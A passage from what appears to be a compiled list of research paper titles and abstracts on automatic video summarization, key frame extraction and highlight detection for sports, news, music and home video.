to capture few "strong" highlights or more "less strong" ones. We evaluate and discuss the performance of our method on the case study of soccer TV broadcasts. --- paper_title: Semantic units detection and summarization of baseball videos paper_content: A framework for analyzing baseball videos and generation of game summary is proposed. Due to the well-defined rules of baseball games, the system efficiently detects semantic units by the domain-related knowledge, and therefore, automatically discovers the structure of a baseball game. After extracting the information changes that are caused by some semantic events on the superimposed caption, a rule-based decision tree is applied to detect meaningful events. Only three types of information, including number-of-outs, score, and base occupation status, are taken in the detection process, and thus the framework detects events and produces summarization in an efficient and effective manner. The experimental results show the effectiveness of this framework and some research opportunities about generating semantic-level summary for sports videos. --- paper_title: Information theory-based shot cut/fade detection and video summarization paper_content: New methods for detecting shot boundaries in video sequences and for extracting key frames using metrics based on information theory are proposed. The method for shot boundary detection relies on the mutual information (MI) and the joint entropy (JE) between the frames. It can detect cuts, fade-ins and fade-outs. The detection technique was tested on the TRECVID2003 video test set having different types of shots and containing significant object and camera motion inside the shots. It is demonstrated that the method detects both fades and abrupt cuts with high accuracy. The information theory measure provides us with better results because it exploits the inter-frame information in a more compact way than frame subtraction. It was also successfully compared to other methods published in literature. The method for key frame extraction uses MI as well. We show that it captures satisfactorily the visual content of the shot. --- paper_title: Automatically generating summaries for musical video paper_content: In this paper, we propose a novel approach to automatically summarize musical videos. The proposed summarization scheme is different from the current methods used for video summarization. The musical video is separated into the musical and visual tracks. A music summary is created by analyzing the music content based on music features, adaptive clustering algorithm and musical domain knowledge. Then, shots are detected and clustered in the visual track. Finally, the music video summary is created by aligning the music summary and clustered video shots. Subjective studies by experienced users have been conducted to evaluate the quality of summarization. The experiments on different genres of musical video and comparisons with the summaries only based on music track and video track indicate that the results of summarization using proposed method are significant and effective to help realize user's expectation. --- paper_title: An approach to generating two-level video abstraction paper_content: Video abstraction is a short summary of the content of a longer video document. Most existing video abstraction methods are based on shot-level, which is not sufficient to meaningful browsing and is too fine to users sometimes. In this paper, we propose a novel approach of generating video abstraction at two levels, namely, the shot-level and the scene-level. We put up a method of extracting key frames from shots, according to the content variation of the latter. An updated time-adaptive algorithm is used to group the shots into scene and representative frames are extracted in the region of that scene using the method of generating Minimum Spanning Tree. Key frames and representative frames can represent the content of shots and scenes, respectively. The organized sequences of key frames and representative frames are the two-level video abstraction. Experiments based on real-world movies show that the method above can provide users with better video summary at different levels. --- paper_title: Summarization of news video and its description for content‐based access paper_content: A video summary abstracts the entirety with the gist without losing the essential content of the original video and also facilitates efficient content-based access to the desired content. In this article, we propose a novel method for summarizing a news video based on multimodal analysis of the content. The proposed method exploits the closed caption (CC) data to locate semantically meaningful highlights in a news video and speech signals in an audio stream to align the CC data with the video in a time-line. Then, the extracted highlights are described in a multilevel structure using the MPEG-7 Summarization Description Scheme (DS). Specifically, we use the HierarchicalSummary DS that allows efficient accessing of the content through such functionalities as multilevel abstracts and navigation guidance in a hierarchical fashion. Intensive experiments with our prototypical systems are presented to demonstrate the validity and reliability of the proposed method in real applications. © 2004 Wiley Periodicals, Inc. Int J Imaging Syst Technol 13, 267–274, 2003; Published online in Wiley InterScience (www.interscience.wiley.com). DOI 10.1002/ima.10067 --- paper_title: Narrative abstraction model for story-oriented video paper_content: TV program review services, especially drama review services, are one of the most popular video on demand services on the Web. In this paper, we propose a novel video abstraction model for a review service of story-oriented video such as dramas. In a drama review service, viewers want to understand the story in a short time and service providers want to provide video abstracts at minimum cost. The proposed model enables the automatic creation of a video abstract that still allows viewers to understand the overall story of the source video. Also, the model has a flexible structure so that the duration of an abstract can be adjusted depending on the requirements given by viewers. We get clues for human understanding of a story from scenario writing rules and editorial techniques which are popularly used in the process of video producing. We have implemented the proposed model and successfully applied it to several TV dramas. --- paper_title: Automatically extracting highlights for TV Baseball programs paper_content: In today's fast-paced world, while the number of channels of television programming available is increasing rapidly, the time available to watch them remains the same or is decreasing. Users desire the capability to watch the programs time-shifted (on-demand) and/or to watch just the highlights to save time. In this paper we explore how to provide for the latter capability, that is the ability to extract highlights automatically, so that viewing time can be reduced. We focus on the sport of baseball as our initial target—it is a very popular sport, the whole game is quite long, and the exciting portions are few. We focus on detecting highlights using audio-track features alone without relying on expensive-to-compute video-track features. We use a combination of generic sports features and baseball-specific features to obtain our results, but believe that may other sports offer the same opportunity and that the techniques presented here will apply to those sports. We present details on relative performance of various learning algorithms, and a probabilistic framework for combining multiple sources of information. We present results comparing output of our algorithms against human-selected highlights for a diverse collection of baseball games with very encouraging results. --- paper_title: Sequential association mining for video summarization paper_content: In this paper, we propose an association-based video summarization scheme that mines sequential associations from video data for summary creation. Given detected shots of video V, we first cluster them into visually distinct groups, and then construct a sequential sequence by integrating the temporal order and cluster type of each shot. An association mining scheme is designed to mine sequentially associated clusters from the sequence, and these clusters are selected as summary candidates. With a user specified summary length, our system generates the corresponding summary by selecting representative frames from candidate clusters and assembling them by their original temporal order. The experimental evaluation demonstrates the effectiveness of our summarization method. --- paper_title: Automatic generation of video summaries for historical films paper_content: A video summary is a sequence of video clips extracted from a longer video. Much shorter than the original, the summary preserves its essential messages. In the ECHO (European Chronicles On-line) project, a system was developed to store and manage large collections of historical films for the preservation of cultural heritage. At the University of Mannheim, we have developed the video summarization component of the ECHO system. We discuss the particular challenges the historical film material poses, and how we have designed new video processing algorithms and modified existing ones to cope with noisy black-and-white films. --- paper_title: VSUM: summarizing from videos paper_content: Summarization on produced type of video data (like news or movies) is to find important segments that contain rich information. Users could obtain the important messages by reading summaries rather than full documents. The research in this area could be divided into two parts: (I) image processing (IP) perspective, and (2) NLP (nature language processing) perspective. The former put emphasis on the detection of key frames, while the later focused on the extraction of important concepts. This paper proposes a video summarization system, VSUM. VSUM first identifies all caption words, and then adopts a technique to find the important segments. An external thesaurus is also used in VSUM to enhance the summary extraction process. The experimental results show that VSUM could perform well even if the accuracy of OCR (optical character recognition) is not sophisticating. --- paper_title: Video summarization and scene detection by graph modeling paper_content: We propose a unified approach for video summarization based on the analysis of video structures and video highlights. Two major components in our approach are scene modeling and highlight detection. Scene modeling is achieved by normalized cut algorithm and temporal graph analysis, while highlight detection is accomplished by motion attention modeling. In our proposed approach, a video is represented as a complete undirected graph and the normalized cut algorithm is carried out to globally and optimally partition the graph into video clusters. The resulting clusters form a directed temporal graph and a shortest path algorithm is proposed to efficiently detect video scenes. The attention values are then computed and attached to the scenes, clusters, shots, and subshots in a temporal graph. As a result, the temporal graph can inherently describe the evolution and perceptual importance of a video. In our application, video summaries that emphasize both content balance and perceptual quality can be generated directly from a temporal graph that embeds both the structure and attention information. --- paper_title: Low cost soccer video summaries based on visual rhythm paper_content: The visual rhythm is a spatio-temporal sampled representation of video data providing compact information while preserving several types of video events.We exploit these properties in the present work to propose two new low level descriptors for the analysis of soccer videos computed directly from the visual rhythm.The descriptors are related to dominant color and camera motion estimation.The new descriptors are applied in different tasks aiming the analysis of soccer videos such as shot transition detection, shot classification and attack direction estimation.We also present a simple automated soccer summary application to illustrate the use of the new descriptors. --- paper_title: MSN: statistical understanding of broadcasted baseball video using multi-level semantic network paper_content: The information processing of sports video yields valuable semantics for content delivery over narrowband networks. Traditional image/video processing is formulated in terms of low-level features describing image/video structure and intensity, while the high-level knowledge such as common sense and human perceptual knowledge are encoded in abstract and nongeometric representations. The management of semantic information in video becomes more and more difficult because of the large difference in representations, levels of knowledge, and abstract episodes. This paper proposes a semantic highlight detection scheme using a Multi-level Semantic Network (MSN) for baseball video interpretation. The probabilistic structure can be applied for highlight detection and shot classification. Satisfactory results will be shown to illustrate better performance compared with the traditional ones. --- paper_title: MINMAX optimal video summarization paper_content: The need for video summarization originates primarily from a viewing time constraint. A shorter version of the original video sequence is desirable in a number of applications. Clearly, a shorter version is also necessary in applications where storage, communication bandwidth and/or power are limited. In this paper, our work is based on a MINMAX optimization formulation with viewing time, frame skip and bit rate constraints. New metrics for missing frame and video summary distortions are introduced. Optimal algorithm based on dynamic programming is presented along with experimental results. --- paper_title: Video skimming and characterization through the combination of image and language understanding paper_content: Digital video is rapidly becoming important for education, entertainment and a host of multimedia applications. With the size of the video collections growing to thousands of hours, technology is needed to effectively browse segments in a short time without losing the content of the video. We propose a method to extract the significant audio and video information and create a skim video which represents a very short synopsis of the original. The goal of this work is to show the utility of integrating language and image understanding techniques for video skimming by extraction of significant information, such as specific objects, audio keywords and relevant video structure. The resulting skim video is much shorter; where compaction is as high as 20:1, and yet retains the essential content of the original segment. We have conducted a user-study to test the content summarization and effectiveness of the skim as a browsing tool. --- paper_title: An innovative algorithm for key frame extraction in video summarization paper_content: Video summarization, aimed at reducing the amount of data that must be examined in order to retrieve the information desired from information in a video, is an essential task in video analysis and indexing applications. We propose an innovative approach for the selection of representative (key) frames of a video sequence for video summarization. By analyzing the differences between two consecutive frames of a video sequence, the algorithm determines the complexity of the sequence in terms of changes in the visual content expressed by different frame descriptors. The algorithm, which escapes the complexity of existing methods based, for example, on clustering or optimization strategies, dynamically and rapidly selects a variable number of key frames within each sequence. The key frames are extracted by detecting curvature points within the curve of the cumulative frame differences. Another advantage is that it can extract the key frames on the fly: curvature points can be determined while computing the frame differences and the key frames can be extracted as soon as a second high curvature point has been detected. We compare the performance of this algorithm with that of other key frame extraction algorithms based on different approaches. The summaries obtained have been objectively evaluated by three quality measures: the Fidelity measure, the Shot Reconstruction Degree measure and the Compression Ratio measure. --- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts in faster than realtime. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. The prototype experiments have shown the effectiveness and stabilities of the system. --- paper_title: Highlight sound effects detection in audio stream paper_content: This paper addresses the problem of highlight sound effects detection in audio stream, which is very useful in fields of video summarization and highlight extraction. Unlike researches on audio segmentation and classification, in this domain, it just locates those highlight sound effects in audio stream. An extensible framework is proposed and in current system three sound effects are considered: laughter, applause and cheer, which are tied up with highlight events in entertainments, sports, meetings and home videos. HMMs are used to model these sound effects and a log-likelihood scores based method is used to make final decision. A sound effect attention model is also proposed to extend general audio attention model for highlight extraction and video summarization. Evaluations on a 2-hours audio database showed very encouraging results. --- paper_title: Semantic video summarization in compressed domain MPEG video paper_content: In this paper, we present a semantic summarization algorithm that interfaces with the metadata and that works in compressed domain, in particular MPEG-1 and MPEG-2 videos. In enabling a summarization algorithm through high-level semantic content, we try to address two major problems. First, we present the facility provided in the DVA system that allows the semi-automatic creation of this metadata. Second, we address the main point of this system which is the utilization of this metadata to filter out frames, creating an abstract of a video summary quality survey indicates that the proposed method performs satisfactorily. --- paper_title: Personalized abstraction of broadcasted American football video by highlight selection paper_content: Video abstraction is defined as creating shorter video clips or video posters from an original video stream. In this paper, we propose a method of generating a personalized abstract of broadcasted American football video. We first detect significant events in the video stream by matching textual overlays appearing in an image frame with the descriptions of gamestats in which highlights of the game are described. Then, we select highlight shots which should be included in the video abstract from those detected events reflecting on their significance degree and personal preferences, and generate a video clip by connecting the shots augmented with related audio and text. An hour-length video can be compressed into a minute-length personalized abstract. We experimentally verified the effectiveness of this method by comparing man-made video abstracts. --- paper_title: Content-based multimedia information retrieval: State of the art and challenges paper_content: Extending beyond the boundaries of science, art, and culture, content-based multimedia information retrieval provides new paradigms and methods for searching through the myriad variety of media all over the world. This survey reviews 100p recent articles on content-based multimedia information retrieval and discusses their role in current research directions which include browsing and search paradigms, user studies, affective computing, learning, semantic queries, new features and media types, high performance indexing, and evaluation techniques. Based on the current state of the art, we discuss the major challenges for the future. --- paper_title: Classification of self-consumable highlights for soccer video summaries paper_content: An effective scheme for soccer summarization is significant to improve the usage of this massively growing video data. The paper presents an extension to our recent work which proposed a framework to integrate highlights into play-breaks to construct more complete soccer summaries. The current focus is to demonstrate the benefits of detecting some specific audio-visual features during play-break sequences in order to classify highlights contained within them. The main purpose is to generate summaries which are self-consumable individually. To support this framework, the algorithms for shot classification and detection of near-goal and slow-motion replay scenes is described. The results of our experiment using 5 soccer videos (20 minutes each) show the performance and reliability of our framework --- paper_title: Automatic video summarizing tool using MPEG-7 descriptors for personal video recorder paper_content: We introduce an automatic video summarizing tool (AVST) for a personal video recorder. The tool utilizes MPEG-7 visual descriptors to generate a video index for a summary. The resulting index generates not only a preview of a movie but also allows non-linear access with thumbnails. In addition, the index supports the searching of shots similar to a desired one within saved video sequences. Moreover, simple shot-based video editing can readily be achieved using the generated index. --- paper_title: Personalized video summary using visual semantic annotations and automatic speech transcriptions paper_content: A personalized video summary is dynamically generated in our video personalization and summary system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions. Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. The process includes the shot-to-sentence alignment, summary segment selection, and user preference matching and propagation. As a result, the relevant visual shot and audio sentence segments are aggregated and composed into a personalized video summary. --- paper_title: Media content and type selection from always-on wearable video paper_content: A system is described for summarizing head-mounted or hand-carried "always-on" video. The example used is a tourist walking around a historic city with friends and family. The summary consists of a mixture of stills, panoramas and video clips. The system identifies both the scenes to appear in the summary and the media type used to represent them. As there are few shot boundaries in this class of video, the decisions are based on the system's classification of the user's behaviour demonstrated by the motion of the camera, and motion in the scene. --- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing. Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: A fast layout algorithm for visual video summaries paper_content: We created an improved layout algorithm for automatically generating visual video summaries reminiscent of comic book pages. The summaries are comprised of images from the video that are sized according to their importance. The algorithm performs a global optimization with respect to a layout cost function that encompasses features such as the number of resized images and the amount of whitespace in the presentation. The algorithm creates summaries that: always fit exactly into the requested area, are varied by containing few rows with images of the same size, and have little whitespace at the end of the last row. The layout algorithm is fast enough to allow the interactive resizing of the summaries and the subsequent generation of a new layout. --- paper_title: Tennis video abstraction from audio and visual cues paper_content: We propose a context-based model of video abstraction exploiting both audio and video features and applied to tennis TV programs. We can automatically produce different types of summary of a given video depending on the users' constraints or preferences. We have first designed an efficient and accurate temporal segmentation of the video into segments homogeneous w.r.t the camera motion. We introduce original visual descriptors related to the dominant and residual image motions. The different summary types are obtained by specifying adapted classification criteria which involve audio features to select the relevant segments to be included in the video abstract. The proposed scheme has been validated on 22 hours of tennis videos. --- paper_title: Spatio-temporal quality assessment for home videos paper_content: Compared with the video programs taken by professionals, home videos are always with low-quality content resulted from lack of professional capture skills. In this paper, we present a novel spatio-temporal quality assessment scheme in terms of low-level content features for home videos. In contrast to existing frame-level-based quality assessment approaches, a type of temporal segment of video, sub-shot, is selected as the basic unit for quality assessment. A set of spatio-temporal artifacts, regarded as the key factors affecting the overall perceived quality (i.e. unstableness, jerkiness, infidelity, blurring, brightness and orientation), are mined from each sub-shot based on the particular characteristics of home videos. The relationship between the overall quality metric and these factors are exploited by three different methods, including user study, factor fusion, and a learning-based scheme. To validate the proposed scheme, we present a scalable quality-based home video summarization system, aiming at achieving the best quality while simultaneously preserving the most informative content. A comparison user study between this system and the attention model based video skimming approach demonstrated the effectiveness of the proposed quality assessment scheme. --- paper_title: Video summarization by spatial-temporal graph optimization paper_content: In this paper we present a novel approach for video summarization based on graph optimization. Our approach emphasizes both a comprehensive visual-temporal content coverage and visual coherence of the video summary. The approach has three stages. First, the source video is segmented into video shots, and a candidate shot set is selected from the video shots according to some video features. Second, a dissimilarity function is defined between the video shots to describe their spatial-temporal relation, and the candidate video shot set is modelled into a directional graph. Third, we outline a dynamic programming algorithm and use it to search the longest path in the graph as the final video skimming. A static video summary is generated at the same time. Experimental results show encouraging promises of our approach for video summarization. --- paper_title: Affective video content representation and modeling paper_content: This paper looks into a new direction in video content analysis - the representation and modeling of affective video content . The affective content of a given video clip can be defined as the intensity and type of feeling or emotion (both are referred to as affect) that are expected to arise in the user while watching that clip. The availability of methodologies for automatically extracting this type of video content will extend the current scope of possibilities for video indexing and retrieval. For instance, we will be able to search for the funniest or the most thrilling parts of a movie, or the most exciting events of a sport program. Furthermore, as the user may want to select a movie not only based on its genre, cast, director and story content, but also on its prevailing mood, the affective content analysis is also likely to contribute to enhancing the quality of personalizing the video delivery to the user. We propose in this paper a computational framework for affective video content representation and modeling. This framework is based on the dimensional approach to affect that is known from the field of psychophysiology. According to this approach, the affective video content can be represented as a set of points in the two-dimensional (2-D) emotion space that is characterized by the dimensions of arousal (intensity of affect) and valence (type of affect). We map the affective video content onto the 2-D emotion space by using the models that link the arousal and valence dimensions to low-level features extracted from video data. This results in the arousal and valence time curves that, either considered separately or combined into the so-called affect curve, are introduced as reliable representations of expected transitions from one feeling to another along a video, as perceived by a viewer. --- paper_title: Video caption detection and extraction using temporal information paper_content: Video caption detection and extraction is an important step for information retrieval in video databases. In this paper, we extract text information in video by fully utilizing the temporal information contained in the video. First we create a binary abstract sequence from a video segment. By analyzing the statistical pixel changes in the sequence, we can effectively locate the (dis)appealing frames of captions. Finally we extract the captions to create a summary of the video segment. --- paper_title: Automatic Soccer Video Analysis and Summarization paper_content: We propose a fully automatic and computationally efficient framework for analysis and summarization of soccer videos using cinematic and object-based features. The proposed framework includes some novel low-level processing algorithms, such as dominant color region detection, robust shot boundary detection, and shot classification, as well as some higher-level algorithms for goal detection, referee detection, and penalty-box detection. The system can output three types of summaries: i) all slow-motion segments in a game; ii) all goals in a game; iii) slow-motion segments classified according to object-based features. The first two types of summaries are based on cinematic features only for speedy processing, while the summaries of the last type contain higher-level semantics. The proposed framework is efficient, effective, and robust. It is efficient in the sense that there is no need to compute object-based features when cinematic features are sufficient for the detection of certain events, e.g., goals in soccer. It is effective in the sense that the framework can also employ object-based features when needed to increase accuracy (at the expense of more computation). The efficiency, effectiveness, and robustness of the proposed framework are demonstrated over a large data set, consisting of more than 13 hours of soccer video, captured in different countries and under different conditions. --- paper_title: Dynamic storyboards for video content summarization paper_content: We propose an innovative, general purpose, approach to the selection and hierarchical representation of key frames of a video sequence for video summarization. In the first stage the shot detection module performs the video structural analysis; in the second stage the key frame extraction module creates the visual summary; and the last stage the summary post-processing module, after a pre-a classification aimed remove meaningless key frames, create a multilevel storyboard that the user may browse. --- paper_title: Two-Stage Hierarchical Video Summary Extraction to Match Low-Level User Browsing Preferences paper_content: A compact summary of video that conveys visual content at various levels of detail enhances user interaction significantly. In this paper, we propose a two-stage framework to generate MPEG-7-compliant hierarchical key frame summaries of video sequences. At the first stage, which is carried out off-line at the time of content production, fuzzy clustering and data pruning methods are applied to given video segments to obtain a nonredundant set of key frames that comprise the finest level of the hierarchical summary. The number of key frames allocated to each shot or segment is determined dynamically and without user supervision through the use of cluster validation techniques. A coarser summary is generated on-demand in the second stage by reducing the number of key frames to match the low-level browsing preferences of a user. The proposed method has been validated by experimental results on a collection of video programs. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Design and evaluation of a music video summarization system paper_content: We present a system that summarizes the textual, audio, and video information of music videos in a format tuned to the preferences of a focus group of 20 users. First, we analyzed user-needs for the content and the layout of the music summaries. Then, we designed algorithms that segment individual song videos from full music video programs by noting changes in color palette, transcript, and audio classification. We summarize each song with automatically selected high level information such as title, artist, duration, title frame, and text as well as audio and visual segments of the chorus. Our system automatically determines with high recall and precision chorus locations, from the placement of repeated words and phrases in the text of the song's lyrics. Our Bayesian belief network then selects other significant video and audio content from the multiple media. Overall, we are able to compress content by a factor of 10. Our second user study has identified the principal variations between users in their choices of content desired in the summary, and in their choices of the platforms that should support their viewing. --- paper_title: Auto-summarization of audio-video presentations paper_content: As streaming audio-video technology becomes widespread, there is a dramatic increase in the amount of multimedia content available on the net. Users face a new challenge: How to examine large amounts of multimedia content quickly. One technique that can enable quick overview of multimedia is video summaries; that is, a shorter version assembled by picking important segments from the original. We evaluate three techniques for automatic creation of summaries for online audio-video presentations. These techniques exploit information in the audio signal (e.g., pitch and pause information), knowledge of slide transition points in the presentation, and information about access patterns of previous users. We report a user study that compares automatically generated summaries that are 20%-25% the length of full presentations to author generated summaries. Users learn from the computer-generated summaries, although less than from authors' summaries. They initially find computer-generated summaries less coherent, but quickly grow accustomed to them. --- paper_title: A highlight scene detection and video summarization system using audio feature for a personal video recorder paper_content: The personal video recorder such as recordable-DVD recorder, Blu-ray disc recorder and/or hard disc recorder has become popular for a large volume storage device for video/audio content data and a browsing function that would quickly provide a desired scene to the user is required as an essential part of such a large capacity recording/playback system. We propose a highlight scene detection function by using only 'audio' features and realize a browsing function for the recorder that enables completely automatic detection of sports highlights. We detect sports highlights by identifying portions with "commentator's excited speech" using Gaussian mixture models (GMM's) trained using the MDL criterion. Our computation is carried out directly on the MDCT coefficients from the AC-3 coefficients thus giving us a tremendous speed advantage. Our accuracy of detection of sports highlights is high across a variety of sports. --- paper_title: Flashlight and player detection in fighting sport for video summarization paper_content: In this paper, we present a method for generating fighting sport videos summary highlights using flashlight [N. Benjamas et al., May 2005] and player detection by detecting frames that contain close-up flashlight and players. Detected flashlight and distance between players is utilized in efficient summarization of fighting sport videos. The proposed algorithm first player was detected using skin color detection and connected component labeling. Then, the algorithm identifies the correct frame by calculating the distance between players that distance between one player and another one. Our algorithm accurately detects distance between players that it has the ability to capture inherently important events. --- paper_title: A utility framework for the automatic generation of audio-visual skims paper_content: In this paper, we present a novel algorithm for generating audio-visual skims from computable scenes. Skims are useful for browsing digital libraries, and for on-demand summaries in set-top boxes. A computable scene is a chunk of data that exhibits consistencies with respect to chromaticity, lighting and sound. There are three key aspects to our approach: (a) visual complexity and grammar, (b) robust audio segmentation and (c) an utility model for skim generation. We define a measure of visual complexity of a shot, and map complexity to the minimum time for comprehending the shot. Then, we analyze the underlying visual grammar, since it makes the shot sequence meaningful. We segment the audio data into four classes, and then detect significant phrases in the speech segments. The utility functions are defined in terms of complexity and duration of the segment. The target skim is created using a general constrained utility maximization procedure that maximizes the information content and the coherence of the resulting skim. The objective function is constrained due to multimedia synchronization constraints, visual syntax and by penalty functions on audio and video segments. The user study results indicate that the optimal skims show statistically significant differences with other skims with compression rates up to 90%. --- paper_title: Adaptive extraction of highlights from a sport video based on excitement modeling paper_content: This paper addresses the challenge of automatically extracting the highlights from sports TV broadcasts. In particular, we are interested in finding a generic method of highlights extraction, which does not require the development of models for the events that are thought to be interpreted by the users as highlights. Instead, we search for highlights in those video segments that are expected to excite the users most. It is namely realistic to assume that a highlighting event induces a steady increase in a user's excitement, as compared to other, less interesting events. We mimic the expected variations in a user's excitement by observing the temporal behavior of selected audiovisual low-level features and the editing scheme of a video. Relations between this noncontent information and the evoked excitement are drawn partly from psychophysiological research and partly from analyzing the live-video directing practice. The expected variations in a user's excitement are represented by the excitement time curve, which is, subsequently, filtered in an adaptive way to extract the highlights in the prespecified total length and in view of the preferences regarding the highlights strength: extraction can namely be performed with variable sensitivity to capture few "strong" highlights or more "less strong" ones. We evaluate and discuss the performance of our method on the case study of soccer TV broadcasts. --- paper_title: Semantic units detection and summarization of baseball videos paper_content: A framework for analyzing baseball videos and generation of game summary is proposed. Due to the well-defined rules of baseball games, the system efficiently detects semantic units by the domain-related knowledge, and therefore, automatically discovers the structure of a baseball game. After extracting the information changes that are caused by some semantic events on the superimposed caption, a rule-based decision tree is applied to detect meaningful events. Only three types of information, including number-of-outs, score, and base occupation status, are taken in the detection process, and thus the framework detects events and produces summarization in an efficient and effective manner. The experimental results show the effectiveness of this framework and some research opportunities about generating semantic-level summary for sports videos. --- paper_title: Summarizing wearable video paper_content: "We want to record our entire life by video" is the motivation of this research. Developing wearable devices and huge storage devices will make it possible to keep entire life by video. We could capture 70 years of our life, however, the problem is how to handle such a huge amount of data. Automatic summarization based on personal interest should be required. In this paper we propose an approach to the automatic structuring and summarization of wearable video. (Wearable video is our abbreviation of "video captured by a wearable camera".) In our approach, we make use of a wearable camera and a sensor of brain waves. The video is firstly structured by objective features of video, and the shots are rated by subjective measures based on brain waves. The approach is very successful for real world experiments and it automatically extracted all the events that the subjects reported they had felt interesting. --- paper_title: Information theory-based shot cut/fade detection and video summarization paper_content: New methods for detecting shot boundaries in video sequences and for extracting key frames using metrics based on information theory are proposed. The method for shot boundary detection relies on the mutual information (MI) and the joint entropy (JE) between the frames. It can detect cuts, fade-ins and fade-outs. The detection technique was tested on the TRECVID2003 video test set having different types of shots and containing significant object and camera motion inside the shots. It is demonstrated that the method detects both fades and abrupt cuts with high accuracy. The information theory measure provides us with better results because it exploits the inter-frame information in a more compact way than frame subtraction. It was also successfully compared to other methods published in literature. The method for key frame extraction uses MI as well. We show that it captures satisfactorily the visual content of the shot. --- paper_title: Creating audio keywords for event detection in soccer video paper_content: This paper presents a novel framework called audio keywords to assist event detection in soccer video. Audio keyword is a middle-level representation that can bridge the gap between low-level features and high-level semantics. Audio keywords are created from low-level audio features by using support vector machine learning. The created audio keywords can be used to detect semantic events in soccer video by applying a heuristic mapping. Experiments of audio keywords creation and event detection based on audio keywords have illustrated promising results. According to the experimental results, we believe that audio keyword is an effective representation that is able to achieve more intuitionistic result for event detection in sports video compared with the method of event detection directly based on low-level features. --- paper_title: Hierarchical video summarization based on context clustering paper_content: A personalized video summary is dynamically generated in our video personalization and summarization system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order to maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions. Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. Besides finding the desired contents, the objective is to present a coherent summary. There are diverse methods for creating summaries, and we focus on the challenges of generating a hierarchical video summary based on context information. In our summarization algorithm, three inputs are used to generate the hierarchical video summary output. These inputs are (1) MPEG-7 metadata descriptions of the contents in the server, (2) user preference and usage environment declarations from the user client, and (3) context information including MPEG-7 controlled term list and classification scheme. In a video sequence, descriptions and relevance scores are assigned to each shot. Based on these shot descriptions, context clustering is performed to collect consecutively similar shots to correspond to hierarchical scene representations. The context clustering is based on the available context information, and may be derived from domain knowledge or rules engines. Finally, the selection of structured video segments to generate the hierarchical summary efficiently balances between scene representation and shot selection. --- paper_title: Dynamic video summarization of home video paper_content: An increasing number of people own and use camcorders to make videos that capture their experiences and document their lives. These videos easily add up to many hours of material. Oddly, most of them are put into a storage box and never touched or watched again. The reasons for this are manifold. Firstly, the raw video material is unedited, and is therefore long-winded and lacking visually appealing effects. Video editing would help, but, it is still too time-consuming; people rarely find the time to do it. Secondly, watching the same tape more than a few times can be boring, since the video lacks any variation or surprise during playback. Automatic video abstracting algorithms can provide a method for processing videos so that users will want to play the material more often. However, existing automatic abstracting algorithms have been designed for feature films, newscasts or documentaries, and thus are inappropriate for home video material and raw video footage in general. In this paper, we present new algorithms for generating amusing, visually appealing and variable video abstracts of home video material automatically. They make use of a new, empirically motivated approach, also presented in the paper, to cluster time-stamped shots hierarchically into meaningful units. Last but not least, we propose a simple and natural extension of the way people acquire video - so-called on-the-fly annotations - which will allow a completely new set of applications on raw video footage as well as enable better and more selective automatic video abstracts. Moreover, our algorithms are not restricted to home video but can also be applied to raw video footage in general. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: VideoQA: question answering on news video paper_content: When querying a news video archive, the users are interested in retrieving precise answers in the form of a summary that best answers the query. However, current video retrieval systems, including the search engines on the web, are designed to retrieve documents instead of precise answers. This research explores the use of question answering (QA) techniques to support personalized news video retrieval. Users interact with our system, VideoQA, using short natural language questions with implicit constraints on contents, context, duration, and genre of expected videos. VideoQA returns short precise news video summaries as answers. The main contributions of this research are: (a) the extension of QA technology to support QA in news video; and (b) the use of multi-modal features, including visual, audio, textual, and external resources, to help correct speech recognition errors and to perform precise question answering. The system has been tested on 7 days of news video and has been found to be effective. --- paper_title: Event detection in baseball video using superimposed caption recognition paper_content: We have 